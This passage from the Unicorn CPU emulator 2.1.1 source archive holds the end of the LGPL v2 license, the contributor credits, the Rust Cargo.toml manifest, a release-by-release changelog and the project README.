that you also meet all of these conditions: a) The modified work must itself be a software library. b) You must cause the files modified to carry prominent notices stating that you changed the files and the date of any change. c) You must cause the whole of the work to be licensed at no charge to all third parties under the terms of this License. d) If a facility in the modified Library refers to a function or a table of data to be supplied by an application program that uses the facility, other than as an argument passed when the facility is invoked, then you must make a good faith effort to ensure that, in the event an application does not supply such function or table, the facility still operates, and performs whatever part of its purpose remains meaningful. (For example, a function in a library to compute square roots has a purpose that is entirely well-defined independent of the application. Therefore, Subsection 2d requires that any application-supplied function or table used by this function must be optional: if the application does not supply it, the square root function must still compute square roots.) These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the Library, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. 
But when you distribute the same sections as part of a whole which is a work based on the Library, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it. Thus, it is not the intent of this section to claim rights or contest your rights to work written entirely by you; rather, the intent is to exercise the right to control the distribution of derivative or collective works based on the Library. In addition, mere aggregation of another work not based on the Library with the Library (or with a work based on the Library) on a volume of a storage or distribution medium does not bring the other work under the scope of this License. 3. You may opt to apply the terms of the ordinary GNU General Public License instead of this License to a given copy of the Library. To do this, you must alter all the notices that refer to this License, so that they refer to the ordinary GNU General Public License, version 2, instead of to this License. (If a newer version than version 2 of the ordinary GNU General Public License has appeared, then you can specify that version instead if you wish.) Do not make any other change in these notices. Once this change is made in a given copy, it is irreversible for that copy, so the ordinary GNU General Public License applies to all subsequent copies and derivative works made from that copy. This option is useful when you wish to copy part of the code of the Library into a program that is not a library. 4. You may copy and distribute the Library (or a portion or derivative of it, under Section 2) in object code or executable form under the terms of Sections 1 and 2 above provided that you accompany it with the complete corresponding machine-readable source code, which must be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange. If distribution of object code is made by offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place satisfies the requirement to distribute the source code, even though third parties are not compelled to copy the source along with the object code. 5. A program that contains no derivative of any portion of the Library, but is designed to work with the Library by being compiled or linked with it, is called a "work that uses the Library". Such a work, in isolation, is not a derivative work of the Library, and therefore falls outside the scope of this License. However, linking a "work that uses the Library" with the Library creates an executable that is a derivative of the Library (because it contains portions of the Library), rather than a "work that uses the library". The executable is therefore covered by this License. Section 6 states terms for distribution of such executables. When a "work that uses the Library" uses material from a header file that is part of the Library, the object code for the work may be a derivative work of the Library even though the source code is not. Whether this is true is especially significant if the work can be linked without the Library, or if the work is itself a library. The threshold for this to be true is not precisely defined by law. 
If such an object file uses only numerical parameters, data structure layouts and accessors, and small macros and small inline functions (ten lines or less in length), then the use of the object file is unrestricted, regardless of whether it is legally a derivative work. (Executables containing this object code plus portions of the Library will still fall under Section 6.) Otherwise, if the work is a derivative of the Library, you may distribute the object code for the work under the terms of Section 6. Any executables containing that work also fall under Section 6, whether or not they are linked directly with the Library itself. 6. As an exception to the Sections above, you may also compile or link a "work that uses the Library" with the Library to produce a work containing portions of the Library, and distribute that work under terms of your choice, provided that the terms permit modification of the work for the customer's own use and reverse engineering for debugging such modifications. You must give prominent notice with each copy of the work that the Library is used in it and that the Library and its use are covered by this License. You must supply a copy of this License. If the work during execution displays copyright notices, you must include the copyright notice for the Library among them, as well as a reference directing the user to the copy of this License. Also, you must do one of these things: a) Accompany the work with the complete corresponding machine-readable source code for the Library including whatever changes were used in the work (which must be distributed under Sections 1 and 2 above); and, if the work is an executable linked with the Library, with the complete machine-readable "work that uses the Library", as object code and/or source code, so that the user can modify the Library and then relink to produce a modified executable containing the modified Library. (It is understood that the user who changes the contents of definitions files in the Library will not necessarily be able to recompile the application to use the modified definitions.) b) Accompany the work with a written offer, valid for at least three years, to give the same user the materials specified in Subsection 6a, above, for a charge no more than the cost of performing this distribution. c) If distribution of the work is made by offering access to copy from a designated place, offer equivalent access to copy the above specified materials from the same place. d) Verify that the user has already received a copy of these materials or that you have already sent this user a copy. For an executable, the required form of the "work that uses the Library" must include any data and utility programs needed for reproducing the executable from it. However, as a special exception, the source code distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable. It may happen that this requirement contradicts the license restrictions of other proprietary libraries that do not normally accompany the operating system. Such a contradiction means you cannot use both them and the Library together in an executable that you distribute. 7. 
You may place library facilities that are a work based on the Library side-by-side in a single library together with other library facilities not covered by this License, and distribute such a combined library, provided that the separate distribution of the work based on the Library and of the other library facilities is otherwise permitted, and provided that you do these two things: a) Accompany the combined library with a copy of the same work based on the Library, uncombined with any other library facilities. This must be distributed under the terms of the Sections above. b) Give prominent notice with the combined library of the fact that part of it is a work based on the Library, and explaining where to find the accompanying uncombined form of the same work. 8. You may not copy, modify, sublicense, link with, or distribute the Library except as expressly provided under this License. Any attempt otherwise to copy, modify, sublicense, link with, or distribute the Library is void, and will automatically terminate your rights under this License. However, parties who have received copies, or rights, from you under this License will not have their licenses terminated so long as such parties remain in full compliance. 9. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to modify or distribute the Library or its derivative works. These actions are prohibited by law if you do not accept this License. Therefore, by modifying or distributing the Library (or any work based on the Library), you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or modifying the Library or works based on it. 10. Each time you redistribute the Library (or any work based on the Library), the recipient automatically receives a license from the original licensor to copy, distribute, link with or modify the Library subject to these terms and conditions. You may not impose any further restrictions on the recipients' exercise of the rights granted herein. You are not responsible for enforcing compliance by third parties to this License. 11. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent issues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Library at all. For example, if a patent license would not permit royalty-free redistribution of the Library by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Library. If any portion of this section is held invalid or unenforceable under any particular circumstance, the balance of the section is intended to apply, and the section as a whole is intended to apply in other circumstances. It is not the purpose of this section to induce you to infringe any patents or other property right claims or to contest validity of any such claims; this section has the sole purpose of protecting the integrity of the free software distribution system which is implemented by public license practices. 
Many people have made generous contributions to the wide range of software distributed through that system in reliance on consistent application of that system; it is up to the author/donor to decide if he or she is willing to distribute software through any other system and a licensee cannot impose that choice. This section is intended to make thoroughly clear what is believed to be a consequence of the rest of this License. 12. If the distribution and/or use of the Library is restricted in certain countries either by patents or by copyrighted interfaces, the original copyright holder who places the Library under this License may add an explicit geographical distribution limitation excluding those countries, so that distribution is permitted only in or among countries not thus excluded. In such case, this License incorporates the limitation as if written in the body of this License. 13. The Free Software Foundation may publish revised and/or new versions of the Library General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Library specifies a version number of this License which applies to it and "any later version", you have the option of following the terms and conditions either of that version or of any later version published by the Free Software Foundation. If the Library does not specify a license version number, you may choose any version ever published by the Free Software Foundation. 14. If you wish to incorporate parts of the Library into other free programs whose distribution conditions are incompatible with these, write to the author to ask for permission. For software which is copyrighted by the Free Software Foundation, write to the Free Software Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the free status of all derivatives of our free software and of promoting the sharing and reuse of software generally. NO WARRANTY 15. BECAUSE THE LIBRARY IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE LIBRARY, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE LIBRARY "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE LIBRARY IS WITH YOU. SHOULD THE LIBRARY PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 16. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE LIBRARY AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE LIBRARY (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE LIBRARY TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. 
END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Libraries If you develop a new library, and you want it to be of the greatest possible use to the public, we recommend making it free software that everyone can redistribute and change. You can do so by permitting redistribution under these terms (or, alternatively, under the terms of the ordinary General Public License). To apply these terms, attach the following notices to the library. It is safest to attach them to the start of each source file to most effectively convey the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. <one line to give the library's name and a brief idea of what it does.> Copyright (C) <year> <name of author> This library is free software; you can redistribute it and/or modify it under the terms of the GNU Library General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Library General Public License for more details. You should have received a copy of the GNU Library General Public License along with this library; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307 USA. Also add information on how to contact you by electronic and paper mail. You should also get your employer (if you work as a programmer) or your school, if any, to sign a "copyright disclaimer" for the library, if necessary. Here is a sample; alter the names: Yoyodyne, Inc., hereby disclaims all copyright interest in the library `Frob' (a library for tweaking knobs) written by James Random Hacker. <signature of Ty Coon>, 1 April 1990 Ty Coon, President of Vice That's all there is to it! unicorn-2.1.1/CREDITS.TXT000066400000000000000000000042251467524106700147050ustar00rootroot00000000000000This file credits all the contributors of the Unicorn engine project. Key developers ============== Nguyen Anh Quynh Dang Hoang Vu Huitao Chen (chenhuitao) Ziqiao Kong (lazymio) KaiJernLau (xwings) Beta testers (in no particular order) ============================== Nguyen Tan Cong Loi Anh Tuan Edgar Barbosa Joxean Koret Chris Eagle Jay Little, Trail of Bits Jeong Wook Oh Luis Miras Yan Shoshitaishvili, Shellphish & UC Santa Barbara Erik Fischer Darel Griffin, NCC Group Anton Cherepanov Mohamed Saher (halsten) Tyler Colgan Jonathon Reinhart Blue Skeye Chris Maixner Sergi Alvarez, aka pancake (author of radare) Ryan Hileman Tim "diff" Strazzere WanderingGlitch of the Zero Day Initiative Sascha Schirra François Serman Sean Heelan Luke Burnett Parker Thompson Daniel Godas-Lopez Antonio "s4tan" Parata Corey Kallenberg Shift Gabriel Quadros Fabian Yamaguchi Ralf-Philipp Weinmann Mike Guidry Joshua "posixninja" Hill Contributors (in no particular order) ===================================== (Please let us know if you want to have your name here) Nguyen Tan Cong Loi Anh Tuan Shaun Wheelhouse: Homebrew package Kamil Rytarowski: Pkgsrc package Zak Escano: MSVC support. Chris Eagle: Java binding Ryan Hileman: Go binding Antonio Parata: .NET binding Jonathon Reinhart: C unit test Sascha Schirra: Ruby binding Adrian Herrera: Haskell binding practicalswift: Various cool bugs found by fuzzing farmdve: Memory leaking fix Andrew Dutcher: uc_context_{save, restore} API. Stephen Groat: improved CI setup. David Zimmer: VB6 binding. zhangwm: ARM & ARM64 big endian.
Mohamed Osama: FreePascal/Delphi binding. Philippe Antoine (Catena cyber): fuzzing Huitao Chen (chenhuitao) & KaiJern Lau (xwings): Cmake support Huitao Chen (chenhuitao) & KaiJern Lau (xwings): Python3 support for building Kevin Foo (chfl4gs): Travis-CI migration Simon Gorchakov: PowerPC target Stuart Dootson (studoot): MSVC compatibility with PowerPC target support Ziqiao Kong (lazymio): uc_context_free() API and various bug fix & improvement. Sven Almgren (blindmatrix): bug fix Chenxu Wu (kabeor): Documentation Philipp Takacs: virtual tlb, memory snapshots unicorn-2.1.1/Cargo.toml000066400000000000000000000025161467524106700151400ustar00rootroot00000000000000[package] name = "unicorn-engine" version = "2.1.1" authors = ["Ziqiao Kong", "Lukas Seidel"] documentation = "https://github.com/unicorn-engine/unicorn/wiki" edition = "2021" license = "GPL-2.0" readme = "README.md" repository = "https://github.com/unicorn-engine/unicorn" description = "Rust bindings for the Unicorn emulator with utility functions" build = "bindings/rust/build.rs" links = "unicorn" # use `cargo publish --list` to see files to be included # the resulting list what cargo uses to check for out-of-date files during build exclude = [ "/docs", "/bindings/dotnet", "/bindings/go", "/bindings/haskell", "/bindings/java", "/bindings/pascal", "/bindings/python", "/bindings/ruby", "/bindings/vb6", "/bindings/zig", "/samples", "/tests", ] [lib] path = "bindings/rust/src/lib.rs" [dependencies] bitflags = "2.3.3" libc = "0.2" [build-dependencies] cc = { version = "1.0" } cmake = { version = "0.1" } pkg-config = { version = "0.3" } [features] default = ["arch_all"] dynamic_linkage = [] arch_all = ["arch_x86", "arch_arm", "arch_aarch64", "arch_riscv", "arch_mips", "arch_sparc", "arch_m68k", "arch_ppc", "arch_s390x", "arch_tricore"] arch_x86 = [] arch_arm = [] arch_aarch64 = [] arch_riscv = [] arch_mips = [] arch_sparc = [] arch_m68k = [] arch_ppc = [] arch_s390x = [] arch_tricore = [] unicorn-2.1.1/ChangeLog000066400000000000000000000365211467524106700147650ustar00rootroot00000000000000This file details the changelog of Unicorn Engine. ------------------------------- [Version 2.1.1]: Sept 26th, 2024 This is a small release to fix a few urgent issues. - Remove pkg_resources usage - Fix wheels distribution for x86_64 macos - Fix redundant wheel hacks - Support musllinux distribution ------------------------------- [Version 2.1.0]: Sept 22nd, 2024 It has been a while since the last release, and 2.1.0 brings several exciting features. Below is the changelog from the latest to the oldest (though not strictly). Highlights - Revive QEMU logs, now we have `-DUNICORN_LOGGING=yes` to enable all qemu logs. @BitMaskMixer - Faster (up to 40x) write performance by not always doing `store_helper` and cleaning page locks. @tunz @boborjan2 - Brand new python bindings, with strongly typed and many improvements. @elicn - Fix to a long-standing MinGW random segfault bug. - We bring python2 compatibility back. - We now fully support M1, both building and a pre-built wheel. - We support snapshot memory now, with a very low overhead copy-on-write fashion. @PhilippTakacs - An option to bypass MMU is also added, check our FAQ. @PhilippTakacs - A brand new (and modern) java bindings. We are also working to publish it to maven. @nneonneo - We have zig integrated. @kassane @atipls - Now Unicorn no longer allocates 2GB memory for every instance. The memory will be only committed once used and the upper limit can be adjusted with `uc_ctl`. 
- New DotNet binding, now published to both Github and Nuget. @TSRBerry - Release artifacts now include all binaries, thanks to @marameref Fixes & Improvements - RISCV improvements, but we still have a long way to go. @apparentlymart @ks0777 - cmake improvements @scribam @es3n1n - Various Python bindings fixes and improvements @bet4it @rhelmot - Docs. @gerph @BitMaskMixer - Rust bindings. @lockbox @mlgiraud @deadash - TCG backend fixes. @redoste @StalkR @dglynos - PPC32 fixes. @dotCirill - Haiku fixes. @kallisti5 - Improvements to avoid simulator detection. @mrexodia New Contributors * @ks0777 made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1736 * @LG3696 made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1764 * @PhilippTakacs made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1765 * @edsky made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1754 * @tunz made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1790 * @kassane made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1809 * @Xeonacid made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1807 * @nneonneo made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1830 * @lockbox made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1847 * @mlgiraud made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1849 * @basavesh made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1861 * @hamarituc made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1886 * @StalkR made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1907 * @dotCirill made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1910 * @marameref made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1897 * @redoste made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1922 * @xclusivor made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1929 * @elicn made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1629 * @nganhkhoa made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1942 * @es3n1n made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1960 * @BitMaskMixer made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1977 * @apparentlymart made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1995 * @atipls made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1985 * @omer54463 made their first contribution in https://github.com/unicorn-engine/unicorn/pull/2005 Full Changelog: https://github.com/unicorn-engine/unicorn/compare/2.0.1...2.1.0 Again, thanks to all contributors and sorry if I missed your name here (please tell me @wtdcode !). 2.1.1 is also coming because we expect some minor breaking changes to fix. (A short Python sketch of the new `uc_ctl` API follows the next entry.) ------------------------------- [Version 2.0.1.post1]: Nov 22nd, 2022 This is a small release to complement the previous 2.0.1 release. Fix: - Fix the endianness detection in tests. - Fix the version number in CMakeLists.txt.
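To make the `uc_ctl` mentions in the surrounding entries concrete, here is a minimal sketch driving the API from the Python binding. It is a sketch only: it assumes a Unicorn 2.x Python binding exposing the `ctl_*` convenience wrappers, and the exact helper names should be treated as assumptions if your version differs.

```python
# Hedged uc_ctl sketch: assumes the unicorn 2.x Python binding and its
# ctl_* convenience wrappers (helper names may differ across versions).
from unicorn import Uc, UC_ARCH_ARM, UC_MODE_ARM
from unicorn.arm_const import UC_CPU_ARM_CORTEX_A15

uc = Uc(UC_ARCH_ARM, UC_MODE_ARM)

# Select a CPU model; this must be done before the first emulation starts.
uc.ctl_set_cpu_model(UC_CPU_ARM_CORTEX_A15)

# Query engine properties through uc_ctl.
print(uc.ctl_get_arch(), uc.ctl_get_mode(), uc.ctl_get_page_size())

# Invalidate cached translation blocks for a range, e.g. after patching
# code in place (UC_CTL_TB_REMOVE_CACHE under the hood).
uc.mem_map(0x1000, 0x1000)
uc.ctl_remove_cache(0x1000, 0x2000)
```

The same controls are reachable from C through `uc_ctl()` with the corresponding `UC_CTL_*` requests.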
------------------------------- [Version 2.0.1]: Nov 1st, 2022 Unicorn2 takes its first step into [Debian packages](https://tracker.debian.org/pkg/unicorn-engine) and [vcpkg](https://github.com/microsoft/vcpkg/pull/26101)! Thanks @roehling and @LilyWangL ! Features: - Support building & running on BE hosts. #1710 - Fix and support `clang-cl` on Windows. #1687 - Fix Python `sdist` and add aarch64 Linux wheels. Note `pip` can build Unicorn2 on M1 now! - C# binding is refined and upgraded to .Net 6. #1723 Fix/Improvements: - Various bindings improvements. #1723 - Improvements for tests. #1684 #1683 #1691 #1711 - Fail explicitly when VEX.L is set. #1658 - Fix endianness when writing PPC32 CR register. #1659 - Fix a bug in `uc_ctl_set_cpu_model` check. - Fix Tricore PC not updating. #1668 - Fix mappings not being updated when users modify them in hooks. - Handle pathological cases consistently. #1651 - Fix memory leaks in PPC target. #1680 - Fix memory leaks in Tricore target. #1681 - Fix MSVC handling in cmake. #1693 - Fix PC sync-ing problems for `UC_HOOK_BLOCK` hooks. - Fix PC being synced twice when users request a soft restart. - Prevent overflow with pre-allocated RAM blocks. #1712 - Add FPCR and FPSR registers #1722 - Fix ARM CPU state not being deep copied. - Fix PC not being synced for memory operations on aarch64. - Exit invalid store operations early to avoid the target registers being overwritten. - Improve the support for ARM BE32. Thanks: @roehling @LilyWangL @mrexodia @zachriggle @Yu3H0 @rhelmot @relapids @sh4w1 @TSRBerry ------------------------------- [Version 2.0.0]: July 7th, 2022 Features: - TriCore Support (#1568) Fixes/Improvements: - Build both shared library and static archive as unicorn1 does. - Misc bindings improvements. #1569 #1600 #1609 #1613 #1616 - Make sure setjmp-setjmp-wrapper-win32 participates in the build. #1604 - Improve Rust bindings build logic. - Fix wrong python binding for UC_CTL_TB_REMOVE_CACHE - Flush translation blocks when the count hook is removed. - Fix unicorn crash when nested `uc_emu_start` deletes a hook - Fix CPU not fully resumed when writing PC. - Don't quit TB if `uc_mem_protect` doesn't change the protection of current TB memory. - Add type annotations for python bindings. - Add CPUID hook for python bindings. #1618 - Don't repeat memory hooks if there is already an unhandled error. #1618 - Support reads and writes over all Arm SIMD registers #1621 - Fix wrong registers range in python bindings. - Fix uc_mem_protect on mmio regions - Fix a UAF caused by hook cache. - Fix the value collision between UC_MODE_ARMBE8 and UC_MODE_ARM926 Thanks: @AfoHT @mrexodia @bet4it @lowlyw @ekilmer @ondryaso @QDucasse @PalumboN @uberwoozle ---------------------------------- [Version 2.0.0 rc7]: April 17, 2022 This release is expected to be the real last RC release of Unicorn2. ;) Features: - Correctly generate static archives for the static build and have CI auto-tested. - Rust bindings revised. #1584 - Compatible with clang-cl compiler. #1581 - Implement UC_HOOK_INSN for aarch64 MRS/MSR/SYS/SYSL Fixes/Improvements: - Several corner cases on our API. #1587 #1595 - Fix the codegen buffer leak. - Rust bindings improvements. #1574 #1575 - Add "holes" to allow unicorn lib as a drop-in replacement for older ones. #1572 - s390x backports. #1570 - Fix exits wrongly removed in nested uc_emu_start - Fix a possible endless loop for only one translation block in a multithreaded environment. - Fix wrong PC without `UC_HOOK_CODE` installed. - Update vb6 bindings license.
#1563 - Fix buffer allocation failure on M1. #1559 - Fix wrong EFLAGS on startup. - Fix wrong internal states on nested uc_emu_start. - Remove armeb-softmmu and aarch64eb-softmmu which are usermode targets. - Advance PPC32 PC. #1558 - Support UC_PPC_REG_CR. - Update CI to windows-2019 Thanks: @shuffle2 @liyansong2018 @rose4096 @nviennot @n1tram1 @iii-i @dzzie @yrashk @bet4it ---------------------------------- [Version 2.0.0 rc6]: February 13, 2022 This release is expected to be the last RC release of Unicorn2. Features: - SystemZ (aka. s390x) support. #1521 #1547 - CPUID hook now may return a bool to indicate whether to skip the CPUID instruction. - ARM/AARCH64 coprocessor registers read/write support. #889 Fixes/Improvements: - Rust improvements. More register enums #1504 Easier to use #1543 #1545 - M68k improvements. #1507 - Golang improvements. Enable `uc_ctl_set_model` #1506 - Unit tests improvements. #1512 - Various ARM system mode fixes. #1500 #1520 #1525 #1531 - Read/write arm FPSCR and FPSID. #1453 - Fix the support for ARMv8 - Fix a large number of memory leaks and unicorn2 now goes with google/oss-fuzz! - Add more X87 registers. #1524 - Add more PPC registers. - Fix the exception not cleared in python bindings. #1537 - Correctly support ARM big endian and drop `armeb-softmmu` and `aarch64eb-softmmu` - Fix ARM CPSR.E not reflected during runtime. - Resolve fuzzing speed problem on macOS. - Modernize CMakeLists.txt. #1544 - Fix an issue in nested `uc_emu_start` Thanks: @Kritzefitz @zznop @QDucasse @gerph @bet4it @mrexodia @iii-i @jbcayrou @scribam ---------------------------------- [Version 2.0.0 rc5]: November 25, 2021 This release fixes a few urgent bugs and improves performance. Fixes/Improvements: - Rust bindings improvements. #1480 #1483 - Allow R/W to cp15 registers. #1481 - Fix `UC_HOOK_EDGE_GENERATED` not being called for indirect jumps. - Python bindings build improvements. #1486 - Fix bindings on m1 macOS. - Support nested `uc_emu_start` calls without context save/restore - Fix wrong MMIO offset for 32bit targets. - Fix wrong `uc_mem_unmap` logic for both ram and mmio memory. - Inline `uc_trace_code` and PC sync to improve performance. - Various fixes in tests. - Allow writing to CPSR to switch bank registers. - Implement MMIO in rust bindings. #1499 Thanks: - @domenukk - @bet4it - @mid-kid - @Kritzefitz ---------------------------------- [Version 2.0.0 rc4]: November 09, 2021 This is a big release of Unicorn and introduces a few powerful new features and a bunch of fixes. New Features: - New API: uc_ctl, by which you could control CPU models, TB caches or multiple exits etc. - New Hook: UC_HOOK_EDGE_GENERATED, UC_HOOK_TCG_OPCODE - RISCV CSR read/write. - Support reading MIPS hi/lo regs. 7268c2a19bce2db72b90e3ea3b133482c3ff4e58 - OSS Fuzzing building support. - MSVC 32bit and Android build support. - Introduce clang-format. Fixes/Improvements: - Java bindings improvements. unicorn-engine/unicorn#1461 - API Documents updates. unicorn-engine/unicorn#1459 - Rust bindings improvements. unicorn-engine/unicorn#1462 - Add a go.mod for go bindings. - CMakeLists.txt improvements as a subproject. #1373 - Fix rust bindings build script and add CI. - Use binary search to find mappings. unicorn-engine/unicorn#1414 - RISCV: - Update pc when exiting execution. unicorn-engine/unicorn#1465 - Add RISCV control status registers to enable floating point. unicorn-engine/unicorn#1469 unicorn-engine/unicorn#1478 - After `ecall`, pc not advanced.
unicorn-engine/unicorn#1477 - Fix tb not invalidated when exiting. - Fix bindings makefile. - Fix uc_mem_protect not working. unicorn-engine/unicorn#1468 Thanks: - @bet4it - @kabeor - @chfl4gs - @QDucasse - @h33p - @geohot - @cla7aye15I4nd - @jcalabres ---------------------------------- [Version 2.0.0 rc3]: October 06, 2021 This is an urgent pre-release regarding python bindings on older Linux systems. - Support older Linux distribution, e.g. prior to Ubuntu 19.04 - Fix a memory leak in `uc_close` - Support building on Android - Support hooking CPUID instruction. Enjoy. ---------------------------------- [Version 2.0.0 rc2]: October 05, 2021 This is an urgent pre-release regarding the packaging problem of python bindings. - Set `zip_false` and `is_pure` to `False` to avoid issues on some Linux distributions. - Link to `libm` to make sure our libraries work. - Support to read ST registers in rust bindings. - Fix #1450 Enjoy. ---------------------------------- [Version 2.0.0 rc1]: October 04, 2021 Unicorn2 first release candidate! - Based on Qemu 5.0.1 - Remain backward compatible with Unicorn 1.x - Update ISA of all existing architectures - Support 2 new architectures in PowerPC & RISCV ---------------------------------- [Unicorn2-beta]: October 3rd, 2021 - Release Unicorn2 beta to public. - New logo to celebrate this important milestone! ---------------------------------- [Version 1.0.1]: April 20th, 2017 - Properly handle selected-architecture build. - Fix compilation issues on PPC & S390x. - Fix a memory leak on uc_mem_protect(). - ARM: - Support big-endian mode. - Correct instruction size of Thumb/Thumb2 code. - Support read/write APSR register. - ARM64: - Support read/write NEON registers. - Support read/write NZCV registers. - Mips: Support read/write Mips64 registers. - X86: Support read/write MSR. - Haskell binding: update to the latest API. - Python: allow not having PATH setup. ---------------------------------- [Version 1.0]: February 23rd, 2017 - Fix build script for BSD host. - Fix building Unicorn on Arm/PPC/Sparc/S390 hosts. - X86: - Fix 16bit address computation. - Fix initial state of segment registers. ---------------------------------- [Version 1.0-rc3]: January 25th, 2017 - Rename API uc_context_free() to uc_free(). - ARM: - uc_reg_write() now can modify CPSR register. - Add some ARM coproc registers. - ARM64: uc_reg_read|write() now handles W0-W31 registers. - Windows: fix a double free bug in uc_close(). - New VB6 binding. - Java: update to support new APIs from v1.0-rc1. - Python: - Fix memory leaking that prevents UC instances from being GC. - Remove some dependencies leftover from glib time. - Add new method mem_regions() (linked to uc_mem_regions() API) ---------------------------------- [Version 1.0-rc2]: January 4th, 2017 - Remove glib & pkconfig dependency. - Python: fix an issue to restore support for FreeBSD (and other *BSD Unix). - ARM: support MCLASS cpu (Cortex-M3). - Windows: export a static lib that can be used outside of Mingw ---------------------------------- [Version 1.0-rc1]: December 22nd, 2016 - Lots of bugfixes in all architectures. - Better support for ARM Thumb. - Fix many memory leaking issues. - New bindings: Haskell, MSVC. - Better support for Python3. - New APIs: uc_query, uc_reg_write_batch, uc_reg_read_batch, uc_mem_map_ptr, uc_mem_regions, uc_context_alloc, uc_context_save & uc_context_restore. - New memory hook type: UC_HOOK_MEM_READ_AFTER. 
- Add new version macros UC_VERSION_{MAJOR, MINOR, EXTRA} ---------------------------------- [Version 0.9]: October 15th, 2015 - Initial public release. unicorn-2.1.1/README.md000066400000000000000000000040671467524106700144720ustar00rootroot00000000000000Unicorn Engine ============== [![pypi downloads](https://pepy.tech/badge/unicorn)](https://pepy.tech/project/unicorn) [![Fuzzing Status](https://oss-fuzz-build-logs.storage.googleapis.com/badges/unicorn.svg)](https://bugs.chromium.org/p/oss-fuzz/issues/list?sort=-opened&can=1&q=proj:unicorn)

Unicorn is a lightweight, multi-platform, multi-architecture CPU emulator framework, based on [QEMU](http://qemu.org). Unicorn offers some unparalleled features: - Multi-architecture: ARM, ARM64 (ARMv8), M68K, MIPS, PowerPC, RISCV, SPARC, S390X, TriCore and X86 (16, 32, 64-bit) - Clean/simple/lightweight/intuitive architecture-neutral API - Implemented in pure C language, with bindings for Crystal, Clojure, Visual Basic, Perl, Rust, Ruby, Python, Java, .NET, Go, Delphi/Free Pascal, Haskell, Pharo, Lua and Zig. - Native support for Windows & *nix (with Mac OSX, Linux, Android, *BSD & Solaris confirmed) - High performance via Just-In-Time compilation - Support for fine-grained instrumentation at various levels - Thread-safety by design - Distributed under the free software license GPLv2 A minimal usage example in Python is shown below. Further information is available at http://www.unicorn-engine.org License ------- This project is released under the [GPL license](COPYING). Compilation & Docs ------------------ See the [docs/COMPILE.md](docs/COMPILE.md) file for how to compile and install Unicorn. More documentation is available in [docs/README.md](docs/README.md). Contact ------- [Contact us](http://www.unicorn-engine.org/contact/) via mailing list, email or twitter for any questions. Contribute ---------- If you want to contribute, please pick up something from our [Github issues](https://github.com/unicorn-engine/unicorn/issues). We also maintain a list of more challenging problems in [milestones](https://github.com/unicorn-engine/unicorn/milestones) for our regular release. Please send pull requests to our [dev branch](https://github.com/unicorn-engine/unicorn/tree/dev). [CREDITS.TXT](CREDITS.TXT) records important contributors of our project. 